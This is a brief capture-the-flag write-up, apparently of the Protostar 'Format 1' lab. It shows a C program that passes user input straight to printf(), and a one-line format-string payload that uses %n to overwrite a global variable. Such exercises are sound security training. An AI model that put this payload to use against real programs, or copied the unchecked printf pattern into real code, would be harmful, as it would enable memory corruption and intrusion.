# Format 1

## Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
  printf(string);
  
  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}
```

## Challenge

In this we again need to modify the value of `target` variable but this time we need to do that by using format string vulnerability as the program uses `printf()` function so after fiddling around a lot i found the perfect offset to modify `target` and hence on running

```
./format1 `python -c "print 'AAAA'+'\x38\x96\x04\x08'+'BB'+'%x.'*128 + '%n'"`
```

![](images/format1_0.png)

i modified the target